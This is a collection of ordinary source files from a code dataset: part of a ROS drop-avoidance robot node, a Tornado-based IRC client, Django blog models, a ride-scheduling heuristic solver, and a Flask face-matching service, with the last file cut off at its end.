rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n\n elif currentIrRight < ir_right + 10 and currentIrLeft > ir_left + 10:\n # publish turn right\n action_msg.data = [60, 5] # stop first\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 3] # go back\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 2] # turn right\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 4] # go forward\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 1] # turn left\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n\n elif currentIrRight > ir_right + 10 and currentIrLeft > ir_left + 10:\n\n action_msg.data = [60, 5]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 3]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 1]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 2]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n\n elif currentIrRight < ir_right + 10 and currentIrLeft < ir_left + 10:\n action_msg.data = [60, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n else:\n action_msg.data = [60, 0]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n\n rate.sleep()\n\n\ndef listener():\n global seq\n rospy.init_node('pathfinder', anonymous=False)\n rospy.Subscriber(\"/direction\", UInt16, logDirection)\n rospy.Subscriber(\"/ult_srv_NF\", Float64MultiArray, logUltServo)\n rospy.Subscriber(\"/infrared\", Float64MultiArray, logIr)\n # rospy.Subscriber(\"/distance\", Float64MultiArray, logIr)\n\n avoid_drop()\n rospy.spin()\n\nif __name__ == '__main__':\n 
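# bring up the node: register the subscribers, then run the drop-avoidance loop until shutdown\n 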
listener()\n","sub_path":"src/path_finder/src/pathfinder.py","file_name":"pathfinder.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299381078","text":"#!/usr/bin/env python3\n# -*- coding: utf8 -*-\nimport collections\nimport pprint\n\nimport chardet\nimport logbook\nfrom tornado import gen, ioloop, tcpclient\n\nimport possel\n\nlogger = logbook.Logger(__name__)\nloopinstance = ioloop.IOLoop.instance()\n\n\nclass Error(possel.Error):\n \"\"\" Root exception for IRC-related exceptions. \"\"\"\n\n\nclass UnknownNumericCommandError(Error):\n \"\"\" Exception thrown when a numeric command is given but no symbolic version can be found. \"\"\"\n\n\nclass UserNotFoundError(Error):\n \"\"\" Exception Thrown when action is performed on non-existant nick. \"\"\"\n\n\nclass UserAlreadyExistsError(Error):\n \"\"\" Exception Thrown when there is an attempt at overwriting an existing user. \"\"\"\n\n\nclass UnknownModeCommandError(Error):\n \"\"\" Exception thrown on unknown mode change command. \"\"\"\n\n\nclass KeyDefaultDict(collections.defaultdict):\n def __missing__(self, key):\n if self.default_factory is not None:\n self[key] = self.default_factory(key)\n return self[key]\n else:\n return super(KeyDefaultDict, self).__missing__(key)\n\n\ndef split_irc_line(s):\n \"\"\"Breaks a message from an IRC server into its prefix, command, and arguments.\n \"\"\"\n prefix = ''\n trailing = []\n if not s:\n # Raise an exception of some kind\n pass\n if s[0] == ':':\n prefix, s = s[1:].split(' ', 1)\n if s.find(' :') != -1:\n s, trailing = s.split(' :', 1)\n args = s.split()\n args.append(trailing)\n else:\n args = s.split()\n command = args.pop(0)\n return prefix, command, args\n\n\ndef parse_identity(who):\n nick, rest = who.split('!')\n username, host = rest.split('@')\n\n if username.startswith('~'):\n username = username[1:]\n\n return nick, username, host\n\n\ndef get_symbolic_command(command):\n if command.isdecimal():\n try:\n return numeric_to_symbolic[command]\n except KeyError as e:\n raise UnknownNumericCommandError(\"No numeric command found: '{}'\".format(command)) from e\n else:\n return command\n\n\nclass LineStream:\n def __init__(self):\n self.tcp_client_factory = tcpclient.TCPClient()\n self.line_callback = None\n self.connect_callback = None\n\n @gen.coroutine\n def connect(self, host, port):\n logger.debug('Connecting to server {}:{}', host, port)\n self.connection = yield self.tcp_client_factory.connect(host, port)\n logger.debug('Connected')\n if self.connect_callback is not None:\n self.connect_callback()\n logger.debug('Called post-connection callback')\n self._schedule_line()\n\n def handle_line(self, line):\n if self.line_callback is not None:\n self.line_callback(line)\n\n self._schedule_line()\n\n def _schedule_line(self):\n self.connection.read_until(b'\\n', self.handle_line)\n\n def write_function(self, line):\n if line[-1] != '\\n':\n line += '\\n'\n return self.connection.write(line.encode('utf8'))\n\n\nclass IRCServerHandler:\n \"\"\" Models a single IRC Server and channels/users on that server.\n\n Designed to be agnostic to various mechanisms for asynchronous code; you give it a `write_function` callback which\n it will directly call whenever it wants to send things to the server. 
Then you feed it each line from the IRC server\n by calling `IRCServerHandler.handle_line`.\n\n Args:\n nick (str): The nick to use for this server.\n write_function: A callback that takes a single string argument and passes it on to the IRC server connection.\n \"\"\"\n def __init__(self, identity, debug_out_loud=False):\n # Useful things\n self._write = None\n self.identity = identity\n\n # Default values\n self.motd = ''\n\n self.channels = KeyDefaultDict(lambda channel_name: IRCChannel(self._write, channel_name,\n debug_out_loud=debug_out_loud,\n identity=identity))\n\n self.users = dict()\n self.users[identity.nick] = identity\n\n self.callbacks = collections.defaultdict(set)\n\n # Configurables\n self._debug_out_loud = debug_out_loud\n\n def get_user_full(self, who):\n nick, username, host = parse_identity(who)\n try:\n user = self.users[nick]\n if not user.fully_known:\n user.username = username\n user.fully_known = True\n return user\n except KeyError:\n self.users[nick] = User(nick, username)\n self.users[nick].fully_known = True\n return self.users[nick]\n\n def get_user_by_nick(self, nick):\n try:\n return self.users[nick]\n except KeyError:\n self.users[nick] = User(nick)\n return self.users[nick]\n\n def add_callback(self, signal, callback):\n self.callbacks[signal].add(callback)\n\n @property\n def write_function(self):\n return self._write\n\n @write_function.setter\n def write_function(self, new_write_function):\n self._write = new_write_function\n\n def pong(self, value):\n self._write('PONG :{}'.format(value))\n\n def pre_line(self):\n self._write('NICK {}'.format(self.identity.nick))\n self._write('USER {} 0 * :{}'.format(self.identity.username, self.identity.real_name))\n\n def handle_line(self, line):\n try:\n line = str(line, encoding='utf8')\n except UnicodeDecodeError:\n encoding = chardet.detect(line)['encoding']\n logger.debug('UTF8 decode failed, tried autodetecting and got {}, decoding now', encoding)\n line = str(line, encoding=encoding)\n line = line.strip()\n (prefix, command, args) = split_irc_line(line)\n\n try:\n symbolic_command = get_symbolic_command(command)\n except UnknownNumericCommandError:\n self.log_unhandled(command, prefix, args)\n return\n\n try:\n handler_name = 'on_{}'.format(symbolic_command.lower())\n handler = getattr(self, handler_name)\n except AttributeError:\n self.log_unhandled(symbolic_command, prefix, args)\n else:\n handler(prefix, *args)\n\n for callback in self.callbacks[symbolic_command.lower()]:\n callback(self, prefix, *args)\n\n def log_unhandled(self, command, prefix, args):\n logger.warning('Unhandled Command received: {} with args ({}) from prefix {}'.format(command, args, prefix))\n\n # ===============\n # Handlers follow\n # ===============\n def on_ping(self, prefix, token, *args):\n logger.debug('Ping received: {}, {}', prefix, token)\n self.pong(token)\n\n def on_privmsg(self, who_from, to, msg):\n if to.startswith('#'):\n user = self.get_user_full(who_from)\n self.channels[to].on_new_message(user, msg)\n\n # ==========\n # JOIN stuff\n def on_join(self, who, channel):\n user = self.get_user_full(who)\n if user is self.identity:\n self.self_join(channel)\n else:\n self.channels[channel].user_join(user)\n\n def self_join(self, channel):\n pass\n\n def on_rpl_namreply(self, prefix, recipient, secrecy, channel, nicks):\n for nick in nicks.split():\n user = self.get_user_by_nick(nick)\n self.channels[channel].user_join(user)\n\n def on_rpl_endofnames(self, *args):\n pass\n # ==========\n\n def on_notice(self, prefix, _, 
message):\n logger.info('NOTICE: {}'.format(message))\n\n def on_mode(self, prefix, channel, command, nick):\n user = self.get_user_by_nick(nick)\n user.apply_mode_command(channel, command)\n\n def on_nick(self, who, new_nick):\n user = self.get_user_full(who)\n logger.debug('User {} changed nick to {}', user.nick, new_nick)\n del self.users[user.nick]\n user.name = new_nick\n self.users[new_nick] = user\n\n def on_quit(self, who, message):\n user = self.get_user_full(who)\n if user != self.identity:\n for channel in self.channels:\n try:\n self.channels[channel].user_part(user)\n except UserNotFoundError:\n pass\n\n def on_part(self, who, channel):\n user = self.get_user_full(who)\n if user != self.identity:\n self.channels[channel].user_part(user)\n\n def on_rpl_welcome(self, *args):\n pass\n\n def on_rpl_yourhost(self, *args):\n pass\n\n def on_rpl_created(self, *args):\n pass\n\n def on_rpl_myinfo(self, *args):\n pass\n\n def on_rpl_isupport(self, *args):\n logger.debug('Server supports: {}', args)\n\n def on_rpl_luserclient(self, *args):\n pass\n\n def on_rpl_luserop(self, *args):\n pass\n\n def on_rpl_luserchannels(self, *args):\n pass\n\n def on_rpl_luserme(self, *args):\n pass\n\n def on_rpl_localusers(self, *args):\n pass\n\n def on_rpl_globalusers(self, *args):\n pass\n\n def on_rpl_statsconn(self, *args):\n pass\n\n def on_rpl_motdstart(self, *args):\n self.motd = ''\n\n def on_rpl_motd(self, prefix, recipient, motd_line):\n self.motd += motd_line\n self.motd += '\\n'\n\n def on_rpl_endofmotd(self, *args):\n logger.info(self.motd)\n\n # =============\n # Handlers done\n # =============\n\n\nclass User:\n def __init__(self, name, username=None, real_name=None, password=None):\n self.name = name\n self.username = username or name\n self.real_name = real_name or name\n self.modes = collections.defaultdict(set)\n self.fully_known = False\n\n @property\n def nick(self):\n return self.name\n\n def apply_mode_command(self, channel, command):\n \"\"\" Applies a mode change command.\n\n Similar syntax to the `chmod` program.\n \"\"\"\n direction, mode = command\n if direction == '+':\n self.modes[channel].add(mode)\n elif direction == '-' and mode in self.modes[channel]:\n self.modes[channel].remove(mode)\n else:\n raise UnknownModeCommandError('Unknown mode change command \"{}\", expecting \"-\" or \"+\"'.format(command))\n\n def __str__(self):\n modes = set()\n for m in self.modes.values():\n modes |= m\n\n return '{}!{} +{}'.format(self.name, self.username,\n ''.join(modes))\n\n def __repr__(self):\n return str(self)\n\n\nclass IRCChannel:\n def __init__(self, write_function, name, identity, debug_out_loud=False):\n self._write = write_function\n self.name = name\n self.identity = identity\n self.users = set()\n self.messages = []\n\n self._debug_out_loud = debug_out_loud\n\n def user_join(self, user):\n logger.debug('{} joined {}', user, self.name)\n if user in self.users:\n raise UserAlreadyExistsError(\n 'Tried to add user \"{}\" to channel {}'.format(user.nick, self.name)\n )\n self.users.add(user)\n\n def user_part(self, user):\n logger.debug('{} parted from {}', user, self.name)\n try:\n self.users.remove(user)\n except KeyError as e:\n raise UserNotFoundError(\n 'Tried to remove non-existent nick \"{}\" from channel {}'.format(user.nick, self.name)) from e\n\n def on_new_message(self, who_from, msg):\n self.messages.append((who_from, msg))\n\n if msg.startswith('!d listmessages'):\n logger.debug(self.messages)\n\n if self._debug_out_loud:\n self.send_message(self.messages)\n\n elif 
msg.startswith('!d listusers'):\n logger.debug(self.users)\n\n if self._debug_out_loud:\n self.send_message(pprint.pformat(self.users))\n\n elif msg.startswith('!d raise'):\n raise Error('Debug exception')\n\n def join(self, password=None):\n if password:\n self._write('JOIN {} {}'.format(self.name, password))\n else:\n self._write('JOIN {}'.format(self.name))\n\n def part(self):\n pass\n\n def send_message(self, message):\n if not isinstance(message, (str, bytes)):\n message = str(message)\n for line in message.split('\\n'):\n self.messages.append((self.identity, line))\n self._write('PRIVMSG {} :{}'.format(self.name, line))\n\n\nsymbolic_to_numeric = {\n \"RPL_WELCOME\": '001',\n \"RPL_YOURHOST\": '002',\n \"RPL_CREATED\": '003',\n \"RPL_MYINFO\": '004',\n \"RPL_ISUPPORT\": '005',\n \"RPL_BOUNCE\": '010',\n \"RPL_STATSCONN\": '250',\n \"RPL_LOCALUSERS\": '265',\n \"RPL_GLOBALUSERS\": '266',\n \"RPL_USERHOST\": '302',\n \"RPL_ISON\": '303',\n \"RPL_AWAY\": '301',\n \"RPL_UNAWAY\": '305',\n \"RPL_NOWAWAY\": '306',\n \"RPL_WHOISUSER\": '311',\n \"RPL_WHOISSERVER\": '312',\n \"RPL_WHOISOPERATOR\": '313',\n \"RPL_WHOISIDLE\": '317',\n \"RPL_ENDOFWHOIS\": '318',\n \"RPL_WHOISCHANNELS\": '319',\n \"RPL_WHOWASUSER\": '314',\n \"RPL_ENDOFWHOWAS\": '369',\n \"RPL_LISTSTART\": '321',\n \"RPL_LIST\": '322',\n \"RPL_LISTEND\": '323',\n \"RPL_UNIQOPIS\": '325',\n \"RPL_CHANNELMODEIS\": '324',\n \"RPL_NOTOPIC\": '331',\n \"RPL_TOPIC\": '332',\n \"RPL_INVITING\": '341',\n \"RPL_SUMMONING\": '342',\n \"RPL_INVITELIST\": '346',\n \"RPL_ENDOFINVITELIST\": '347',\n \"RPL_EXCEPTLIST\": '348',\n \"RPL_ENDOFEXCEPTLIST\": '349',\n \"RPL_VERSION\": '351',\n \"RPL_WHOREPLY\": '352',\n \"RPL_ENDOFWHO\": '315',\n \"RPL_NAMREPLY\": '353',\n \"RPL_ENDOFNAMES\": '366',\n \"RPL_LINKS\": '364',\n \"RPL_ENDOFLINKS\": '365',\n \"RPL_BANLIST\": '367',\n \"RPL_ENDOFBANLIST\": '368',\n \"RPL_INFO\": '371',\n \"RPL_ENDOFINFO\": '374',\n \"RPL_MOTDSTART\": '375',\n \"RPL_MOTD\": '372',\n \"RPL_ENDOFMOTD\": '376',\n \"RPL_YOUREOPER\": '381',\n \"RPL_REHASHING\": '382',\n \"RPL_YOURESERVICE\": '383',\n \"RPL_TIME\": '391',\n \"RPL_USERSSTART\": '392',\n \"RPL_USERS\": '393',\n \"RPL_ENDOFUSERS\": '394',\n \"RPL_NOUSERS\": '395',\n \"RPL_TRACELINK\": '200',\n \"RPL_TRACECONNECTING\": '201',\n \"RPL_TRACEHANDSHAKE\": '202',\n \"RPL_TRACEUNKNOWN\": '203',\n \"RPL_TRACEOPERATOR\": '204',\n \"RPL_TRACEUSER\": '205',\n \"RPL_TRACESERVER\": '206',\n \"RPL_TRACESERVICE\": '207',\n \"RPL_TRACENEWTYPE\": '208',\n \"RPL_TRACECLASS\": '209',\n \"RPL_TRACERECONNECT\": '210',\n \"RPL_TRACELOG\": '261',\n \"RPL_TRACEEND\": '262',\n \"RPL_STATSLINKINFO\": '211',\n \"RPL_STATSCOMMANDS\": '212',\n \"RPL_ENDOFSTATS\": '219',\n \"RPL_STATSUPTIME\": '242',\n \"RPL_STATSOLINE\": '243',\n \"RPL_UMODEIS\": '221',\n \"RPL_SERVLIST\": '234',\n \"RPL_SERVLISTEND\": '235',\n \"RPL_LUSERCLIENT\": '251',\n \"RPL_LUSEROP\": '252',\n \"RPL_LUSERUNKNOWN\": '253',\n \"RPL_LUSERCHANNELS\": '254',\n \"RPL_LUSERME\": '255',\n \"RPL_ADMINME\": '256',\n \"RPL_ADMINLOC1\": '257',\n \"RPL_ADMINLOC2\": '258',\n \"RPL_ADMINEMAIL\": '259',\n \"RPL_TRYAGAIN\": '263',\n \"ERR_NOSUCHNICK\": '401',\n \"ERR_NOSUCHSERVER\": '402',\n \"ERR_NOSUCHCHANNEL\": '403',\n \"ERR_CANNOTSENDTOCHAN\": '404',\n \"ERR_TOOMANYCHANNELS\": '405',\n \"ERR_WASNOSUCHNICK\": '406',\n \"ERR_TOOMANYTARGETS\": '407',\n \"ERR_NOSUCHSERVICE\": '408',\n \"ERR_NOORIGIN\": '409',\n \"ERR_NORECIPIENT\": '411',\n \"ERR_NOTEXTTOSEND\": '412',\n \"ERR_NOTOPLEVEL\": '413',\n \"ERR_WILDTOPLEVEL\": '414',\n 
\"ERR_BADMASK\": '415',\n \"ERR_UNKNOWNCOMMAND\": '421',\n \"ERR_NOMOTD\": '422',\n \"ERR_NOADMININFO\": '423',\n \"ERR_FILEERROR\": '424',\n \"ERR_NONICKNAMEGIVEN\": '431',\n \"ERR_ERRONEUSNICKNAME\": '432',\n \"ERR_NICKNAMEINUSE\": '433',\n \"ERR_NICKCOLLISION\": '436',\n \"ERR_UNAVAILRESOURCE\": '437',\n \"ERR_USERNOTINCHANNEL\": '441',\n \"ERR_NOTONCHANNEL\": '442',\n \"ERR_USERONCHANNEL\": '443',\n \"ERR_NOLOGIN\": '444',\n \"ERR_SUMMONDISABLED\": '445',\n \"ERR_USERSDISABLED\": '446',\n \"ERR_NOTREGISTERED\": '451',\n \"ERR_NEEDMOREPARAMS\": '461',\n \"ERR_ALREADYREGISTRED\": '462',\n \"ERR_NOPERMFORHOST\": '463',\n \"ERR_PASSWDMISMATCH\": '464',\n \"ERR_YOUREBANNEDCREEP\": '465',\n \"ERR_YOUWILLBEBANNED\": '466',\n \"ERR_KEYSET\": '467',\n \"ERR_CHANNELISFULL\": '471',\n \"ERR_UNKNOWNMODE\": '472',\n \"ERR_INVITEONLYCHAN\": '473',\n \"ERR_BANNEDFROMCHAN\": '474',\n \"ERR_BADCHANNELKEY\": '475',\n \"ERR_BADCHANMASK\": '476',\n \"ERR_NOCHANMODES\": '477',\n \"ERR_BANLISTFULL\": '478',\n \"ERR_NOPRIVILEGES\": '481',\n \"ERR_CHANOPRIVSNEEDED\": '482',\n \"ERR_CANTKILLSERVER\": '483',\n \"ERR_RESTRICTED\": '484',\n \"ERR_UNIQOPPRIVSNEEDED\": '485',\n \"ERR_NOOPERHOST\": '491',\n \"ERR_NOSERVICEHOST\": '492',\n \"ERR_UMODEUNKNOWNFLAG\": '501',\n \"ERR_USERSDONTMATCH\": '502',\n}\nnumeric_to_symbolic = {v: k for k, v in symbolic_to_numeric.items()}\n\n\ndef _exc_exit(unused_callback):\n import sys\n import traceback\n traceback.print_exc()\n sys.exit(1)\n\n\ndef get_arg_parser():\n import argparse\n arg_parser = argparse.ArgumentParser(description='Possel IRC Client Server')\n arg_parser.add_argument('-n', '--nick', default='possel',\n help='Nick to use on the server.')\n arg_parser.add_argument('-u', '--username', default='possel',\n help='Username to use on the server')\n arg_parser.add_argument('-r', '--real-name', default='Possel IRC',\n help='Real name to use on the server')\n arg_parser.add_argument('-s', '--server', default='irc.imaginarynet.org.uk',\n help='IRC Server to connect to')\n arg_parser.add_argument('-c', '--channel', action='append',\n help='Channel to join on server')\n arg_parser.add_argument('-D', '--debug', action='store_true',\n help='Enable debug logging')\n arg_parser.add_argument('--die-on-exception', action='store_true',\n help='Exit program when an unhandled exception occurs, rather than trying to recover')\n arg_parser.add_argument('--debug-out-loud', action='store_true',\n help='Print selected debug messages out over IRC')\n return arg_parser\n\n\ndef get_parsed_args():\n arg_parser = get_arg_parser()\n args = arg_parser.parse_args()\n\n if not args.channel:\n args.channel = ['#possel-test']\n\n return args\n\n\ndef get_attached_instances(args):\n # Create instances\n line_stream = LineStream()\n server_handler = IRCServerHandler(User(args.nick, args.username, args.real_name),\n debug_out_loud=args.debug_out_loud)\n\n # Attach instances\n server_handler.write_function = line_stream.write_function\n line_stream.connect_callback = server_handler.pre_line\n line_stream.line_callback = server_handler.handle_line\n\n if args.die_on_exception:\n loopinstance.handle_callback_exception = _exc_exit\n\n return line_stream, server_handler\n\n\ndef connect(args, line_stream, server_handler):\n # Connect\n line_stream.connect(args.server, 6667)\n\n # Join channels\n for channel in args.channel:\n loopinstance.call_later(2, server_handler.channels[channel].join)\n\n\ndef main():\n args = get_parsed_args()\n\n line_stream, server_handler = get_attached_instances()\n\n 
connect(args, line_stream, server_handler)\n\n # setup logging\n loghandler = logbook.StderrHandler(level=logbook.DEBUG if args.debug else logbook.INFO)\n\n # GOGOGOGO\n with loghandler.applicationbound():\n loopinstance.start()\n\nif __name__ == '__main__':\n main()\n","sub_path":"possel/irc.py","file_name":"irc.py","file_ext":"py","file_size_in_byte":19583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"512996500","text":"from django.db import models\nfrom autoslug import AutoSlugField\n\n\nclass Tag(models.Model):\n name = models.CharField(max_length=50)\n\n\nclass Post(models.Model):\n title = models.CharField(max_length=200)\n text = models.TextField()\n\n published = models.BooleanField(default=False)\n publish_date = models.DateTimeField(auto_now_add=True, null=True)\n\n slug = AutoSlugField(populate_from='title',always_update=True)\n tags = models.ManyToManyField(Tag, related_name=\"posts\")\n\n class Meta:\n ordering = [\"-publish_date\"]","sub_path":"syte/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"48872768","text":"import numpy as np\nimport queue\nimport heapq\nimport math\n\nprint(\"hello\")\n\nR = 10000\nC = 10000\nF = 1000\nN = 10000\nB = 10000\nT = 1e9\nstart = []\nfinish = []\nstime = []\nftime = []\nrtime = []\nstartx = 0\nstarty = 0\nendx = 0\nendy = 0\nstartxx = 0\nstartyy = 0\nendxx = 0\nendyy = 0\nstartdx = 0\nstartdy = 0\nenddx = 0\nenddy = 0\n\n#fnames = [\"input.txt\", \"output.txt\"]\n#fnames = [\"b_should_be_easy.in\", \"b_should_be_easy.out\"]\n#fnames = [\"c_no_hurry.in\", \"c_no_hurry.out\"]\nfnames = [\"d_metropolis.in\", \"d_metropolis.out\"]\n#fnames = [\"e_high_bonus.in\", \"e_high_bonus.out\"]\n\ndef distance(a1, b1, a2, b2):\n return abs(a1-a2) + abs(b1-b2)\n\ndef badness(a, b):\n da = abs(a - startx) / startdx\n da = math.sqrt(4+da*da) * startdx\n db = abs(b - starty) / startdy\n db = math.sqrt(4+db*db) * startdy\n return da+db\n\ndef doride(car, ride): # (eff, car, pts)\n r,c,t = car\n t2 = t + distance(r,c, start[ride][0], start[ride][1])\n if t2 + rtime[ride] > ftime[ride]:\n return (-1,0,0)\n elif t2 <= stime[ride]:\n pts = B + rtime[ride]\n endtime = stime[ride] + rtime[ride]\n eff = pts / (endtime - t)\n bad = badness(finish[ride][0], finish[ride][1])\n bad = min(bad, T-endtime)\n return (endtime-pts+B-rtime[ride]/4000, (finish[ride][0], finish[ride][1], endtime), pts)\n else:\n pts = rtime[ride]\n endtime = t2 + rtime[ride]\n eff = pts / (endtime - t)\n bad = badness(finish[ride][0], finish[ride][1])\n bad = min(bad, T-endtime)\n return (endtime-pts+B-rtime[ride]/4000, (finish[ride][0], finish[ride][1], endtime), pts)\n\nwith open(fnames[0], 'r') as f:\n line = f.readline().split(' ')\n R = int(line[0])\n C = int(line[1])\n F = int(line[2])\n N = int(line[3])\n B = int(line[4])\n T = int(line[5])\n stime = [0]*N\n ftime = [0]*N\n rtime = [0]*N\n for i in range(N):\n line = f.readline().split(' ')\n s1 = int(line[0])\n s2 = int(line[1])\n f1 = int(line[2])\n f2 = int(line[3])\n start.append((s1, s2))\n finish.append((f1, f2))\n stime[i] = int(line[4])\n ftime[i] = int(line[5])\n rtime[i] = distance(s1,s2, f1,f2)\n startx += s1\n starty += s2\n startxx += s1*s1\n startyy += s2*s2\n endx += f1\n endy += f2\n endxx += f1*f1\n endyy += f2*f2\n \nprint(\"done read\")\n\nstartx /= N\nstarty /= N\nstartxx /= N\nstartyy /= N\nendx /= N\nendy /= N\nendxx /= N\nendyy 
/= N\nstartdx = math.sqrt(startxx - startx*startx)\nstartdy = math.sqrt(startyy - starty*starty)\nenddx = math.sqrt(endxx - endx*endx)\nenddy = math.sqrt(endyy - endy*endy)\n\nprint(startx, starty, startdx, startdy)\n\ncurcars = [0]*F\nfor i in range(F):\n curcars[i] = (0,0,0) # r, c, time\nridedone = [0]*N\n\nQ = []\nfor i in range(F):\n for j in range(N):\n eff, car, pts = doride(curcars[i], j)\n #print(eff, car)\n if eff != -1:\n heapq.heappush(Q, (eff, (i, j, car, curcars[i][2], pts))) # (-eff, (F, N, carstate, lastendtime, pts))\n\nans = []\nfor i in range(F):\n ans.append([])\ntotalscore = 0\n\ncounter = 0\nprint(\"Q %d\" % len(Q))\nwhile Q:\n counter += 1\n if counter % 500000 == 0:\n print(\"Q %d\" % len(Q))\n eff, data = heapq.heappop(Q)\n #print(eff, data)\n i,j,car,endtime,pts = data\n if endtime == curcars[i][2] and not ridedone[j]:\n ans[i].append(j)\n curcars[i] = car\n ridedone[j] = 1\n totalscore += pts\n elif not ridedone[j]:\n eff, car, pts = doride(curcars[i], j)\n if eff >= 0:\n heapq.heappush(Q, (eff, (i, j, car, curcars[i][2], pts))) # (-eff, (F, N, carstate, lastendtime))\n\n# print(ans)\nprint(totalscore)\n\nwith open(fnames[1], 'w') as f:\n for i in range(F):\n f.write(\"%d \" % len(ans[i]))\n for j in range(len(ans[i])):\n f.write(\"%d \" % ans[i][j])\n f.write(\"\\n\")\n \n","sub_path":"solution3.py","file_name":"solution3.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"187631587","text":"import face_recognition\nimport base64\nimport base64\nimport io\nimport numpy as np\nfrom io import BytesIO\nfrom PIL import Image, ImageDraw\n\nfrom flask import Flask, jsonify, request, json\napp = Flask(__name__)\n\n@app.route('/getencoding', methods=['POST'])\ndef getEncoding():\n data = request.files['image']\n camImage = face_recognition.load_image_file(data)\n camera_image_encoding = face_recognition.face_encodings(camImage)[0]\n\n jObj = {}\n jObj['encoding'] = camera_image_encoding.tolist()\n\n response = app.response_class(\n response=json.dumps(jObj),\n status=200,\n mimetype='application/json'\n )\n return response\n \n@app.route('/compareimages', methods=['POST'])\ndef compareimages():\n data = request.get_json(force=True)\n first_encoding = np.array(data['first_encoding'])\n second_encoding = np.array(data['second_encoding'])\n results = face_recognition.compare_faces([first_encoding], second_encoding, tolerance=0.4)\n print(results[0])\n\n rObj = {'match': str(results[0]).lower()}\n data_json = json.dumps(rObj)\n\n print(data_json)\n\n response = app.response_class(\n response=json.dumps(rObj),\n status=200,\n mimetype='application/json'\n )\n\n return response\n\n@app.route('/facialreg', methods=['POST'])\ndef facialreg():\n data = request.get_json(force=True)\n uuid = data[\"uuid\"]\n sampleEncodeImage = data[\"sampleimage\"].replace(\"\\n\",\"\")\n cameraEncodeImage = data[\"camimage\"].replace(\"\\n\",\"\")\n\n sampleImage = face_recognition.load_image_file(io.BytesIO(base64.b64decode(sampleEncodeImage)))\n sample_image_encoding = face_recognition.face_encodings(sampleImage)[0]\n\n camImage = face_recognition.load_image_file(io.BytesIO(base64.b64decode(cameraEncodeImage)))\n camera_image_encoding = face_recognition.face_encodings(camImage)[0]\n\n #compare user taken face image to sample image\n #tolerence is how strict\n #lower the stricter\n #current sweet spot = 0.5, changed from 0.4\n results = face_recognition.compare_faces([sample_image_encoding], 
camera_image_encoding,tolerance=0.5) \n\n #true = match\n #false = not match\n if True in results:\n regStatus = str(\"Match\")\n \n # Find all the faces and face encodings in the camera image\n cam_face_locations = face_recognition.face_locations(camImage)\n cam_face_encodings = face_recognition.face_encodings(camImage, cam_face_locations)\n\n # Convert the image to a PIL-format image so that we can draw on top of it with the Pillow library\n pil_image = Image.fromarray(camImage)\n # Create a Pillow ImageDraw Draw instance to draw with\n draw = ImageDraw.Draw(pil_image)\n\n # Loop through each face found in the unknown image\n for (top, right, bottom, left), face_encoding in zip(cam_face_locations, cam_face_encodings):\n # Draw a box around the face using the Pillow module\n draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))\n\n # Draw a label with a name below the face\n text_width, text_height = draw.textsize(uuid) \n draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))\n draw.text((left + 6, bottom - text_height - 5), uuid, fill=(255, 255, 255, 255))\n\n # Remove the drawing library from memory as per the Pillow docs\n del draw\n\n #convert drawn pil image to base64 \n buffered = BytesIO()\n pil_image.save(buffered, format=\"JPEG\")\n faceDetectBase64 = str(base64.b64encode(buffered.getvalue()))\n faceDetectBase64 = faceDetectBase64.replace(\"b'\",\"\")\n faceDetectBase64 = faceDetectBase64.replace(\"'\",\"\")\n\n else:\n regStatus = str(\"Do Not Match\")\n\n # Find all the faces and face encodings in the camera image\n cam_face_locations = face_recognition.face_locations(camImage)\n cam_face_encodings = face_recognition.face_encodings(camImage, cam_face_locations)\n\n # Convert the image to a PIL-format image so that we can draw on top of it with the Pillow library\n pil_image = Image.fromarray(camImage)\n # Create a Pillow ImageDraw Draw instance to draw with\n draw = ImageDraw.Draw(pil_image)\n\n # Loop through each face found in the unknown image\n for (top, right, bottom, left), face_encoding in zip(cam_face_locations, cam_face_encodings):\n # Draw a box around the face using the Pillow module\n draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))\n\n # Draw a label with a name below the face\n text_width, text_height = draw.textsize(\"unknown\") \n draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))\n draw.text((left + 6, bottom - text_height - 5), \"unknown\", fill=(255, 255, 255, 255))\n\n # Remove the drawing library from memory as per the Pillow docs\n del draw\n\n #convert drawn pil image to base64\n buffered = BytesIO()\n pil_image.save(buffered, format=\"JPEG\")\n faceDetectBase64 = str(base64.b64encode(buffered.getvalue()))\n faceDetectBase64 = faceDetectBase64.replace(\"b'\",\"\")\n faceDetectBase64 = faceDetectBase64.replace(\"'\",\"\")\n \n return jsonify(\n status = regStatus,\n facedetect = faceDetectBase64\n )\n\nif __name__=='__main__':\n app.run(debug=True, 